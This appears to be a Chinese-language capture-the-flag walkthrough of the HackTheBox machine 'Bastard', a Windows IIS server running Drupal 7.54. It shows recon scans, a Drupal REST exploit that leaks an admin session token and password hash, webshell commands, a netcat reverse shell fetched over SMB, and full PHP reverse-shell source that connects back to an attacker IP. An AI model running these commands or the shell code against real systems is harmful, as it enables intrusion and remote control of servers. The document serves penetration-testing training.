Recon
TCP
80,135,49154
UDP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-title: Welcome to Bastard | Bastard |_http-server-header: Microsoft-IIS/7.5 |_http-generator: Drupal 7 (http://drupal.org) 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windo
版本和操作系统扫描,这是台Windows靶机,看一下80端口是一个drupal的程序,再次验证一下
http://10.10.10.9:80 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript], Title[Welcome to Bastard | Bastard], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.3.28, ASP.NET]
robots.txt
文件列举出了一些目录User-agent: * Crawl-delay: 10 # CSS, JS, Images Allow: /misc/*.css$ Allow: /misc/*.css? Allow: /misc/*.js$ Allow: /misc/*.js? Allow: /misc/*.gif Allow: /misc/*.jpg Allow: /misc/*.jpeg Allow: /misc/*.png Allow: /modules/*.css$ Allow: /modules/*.css? Allow: /modules/*.js$ Allow: /modules/*.js? Allow: /modules/*.gif Allow: /modules/*.jpg Allow: /modules/*.jpeg Allow: /modules/*.png Allow: /profiles/*.css$ Allow: /profiles/*.css? Allow: /profiles/*.js$ Allow: /profiles/*.js? Allow: /profiles/*.gif Allow: /profiles/*.jpg Allow: /profiles/*.jpeg Allow: /profiles/*.png Allow: /themes/*.css$ Allow: /themes/*.css? Allow: /themes/*.js$ Allow: /themes/*.js? Allow: /themes/*.gif Allow: /themes/*.jpg Allow: /themes/*.jpeg Allow: /themes/*.png # Directories Disallow: /includes/ Disallow: /misc/ Disallow: /modules/ Disallow: /profiles/ Disallow: /scripts/ Disallow: /themes/ # Files Disallow: /CHANGELOG.txt Disallow: /cron.php Disallow: /INSTALL.mysql.txt Disallow: /INSTALL.pgsql.txt Disallow: /INSTALL.sqlite.txt Disallow: /install.php Disallow: /INSTALL.txt Disallow: /LICENSE.txt Disallow: /MAINTAINERS.txt Disallow: /update.php Disallow: /UPGRADE.txt Disallow: /xmlrpc.php # Paths (clean URLs) Disallow: /admin/ Disallow: /comment/reply/ Disallow: /filter/tips/ Disallow: /node/add/ Disallow: /search/ Disallow: /user/register/ Disallow: /user/password/ Disallow: /user/login/ Disallow: /user/logout/ # Paths (no clean URLs) Disallow: /?q=admin/ Disallow: /?q=comment/reply/ Disallow: /?q=filter/tips/ Disallow: /?q=node/add/ Disallow: /?q=search/ Disallow: /?q=user/password/ Disallow: /?q=user/register/ Disallow: /?q=user/login/ Disallow: /?q=user/logout/
CHANGELOG.txt
Drupal 7.54
启动一个python虚拟环境(requirements.txt),运行droopescan对该drupal进行扫描,交叉确认版本信息
source myenv/bin/activate droopescan scan drupal -u 10.10.10.9
searchsploit Drupal 7. --exclude="metasploit"
搜一下利用,过滤掉metasploit的结果
试试这个利用,改一下参数
Dirsearch工具扫描一下目录,找一下endpoint信息(这一步gobuster和dirsearch都没扫出来,可能是响应时间长被误判为了超时)
sudo dirsearch -u 10.10.10.9 -e php -x 404,403,503 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/rest目录为endpoint path
修改exploit
报错
sudo apt install php-curl
php 41654.php
通过exploit生成的.json文件
cat session.json { "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913", "session_id": "FuUzYilXylyDizRuDO4GlFk1KJYex8rdmxg-fysmSRw", "token": "ESwqLuDU-RigQ3D099IosfBJ28eJ7xwnEilfwKq27iI" }
cat user.json { "uid": "1", "name": "admin", "mail": "drupal@hackthebox.gr", "theme": "", "created": "1489920428", "access": "1492102672", "login": 1694421083, "status": "1", "timezone": "Europe\/Athens", "language": "", "picture": null, "init": "drupal@hackthebox.gr", "data": false, "roles": { "2": "authenticated user", "3": "administrator" }, "rdf_mapping": { "rdftype": [ "sioc:UserAccount" ], "name": { "predicates": [ "foaf:name" ] }, "homepage": { "predicates": [ "foaf:page" ], "type": "rel" } }, "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE" }
这一部分出现了两个有价值的信息,session token和admin用户的hash密码
验证太慢了,换一个方式,试试直接连接刚刚exploit上传的webshell (ivan.php)
curl http://10.10.10.9/ivan.php?ivan=whoami curl http://10.10.10.9/ivan.php?ivan=systeminfo
nt authority\iusr
sudo wget https://github.com/vinsworldcom/NetCat64/releases/download/1.11.6.4/nc64.exe
sudo python /usr/share/doc/python3-impacket/examples/smbserver.py share .
http://10.10.10.9/ivan.php?ivan=\\10.10.16.6\share\nc64.exe -e cmd.exe 10.10.16.6 1234
尝试Cookie session
<?php
// Reverse-shell relay (pentestmonkey-style layout): opens an outbound TCP
// connection to $ip:$port, starts $shell with proc_open, and pumps bytes between
// the socket and the child's stdin/stdout/stderr until one side closes.
//
// Defender notes, all grounded in the code below:
//   - outbound TCP from the web server to $ip:$port (fsockopen)
//   - $shell is a UNC path, so the host fetches nc64.exe over SMB from 10.10.16.13
//     and runs it with "-e cmd.exe" towards a second port (443) on the same host
//   - net effect: the PHP worker becomes the ancestor of nc64.exe/cmd.exe, a
//     process-tree anomaly (web server -> cmd.exe) worth alerting on, alongside
//     outbound SMB from a web tier
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.13'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400; // bytes per fread() on each pump step
$write_a = null;
$error_a = null;
// Command handed to proc_open below; the UNC path is resolved by Windows over SMB.
$shell = '//10.10.16.13/share/nc64.exe -e cmd.exe 10.10.16.13 443';
$daemon = 0;
$debug = 0;

// Detach from the request if the process-control extension exists.
// NOTE(review): pcntl is not part of the usual Windows PHP builds, so on this
// target the else branch is presumably what runs — confirm via phpinfo.
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0); // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

// Outbound connection to the listener; 30-second connect timeout.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Child gets a readable pipe on stdin and writable pipes on stdout/stderr.
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Non-blocking on every stream so the select loop below never stalls on one side.
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

// Pump loop: socket -> child stdin; child stdout/stderr -> socket.
while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    // null timeout: block until at least one of the three streams is readable.
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Prints unless daemonised. NOTE(review): $daemon is read here without `global`,
// so inside the function it is an undefined local (null) and the message always prints.
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>
提权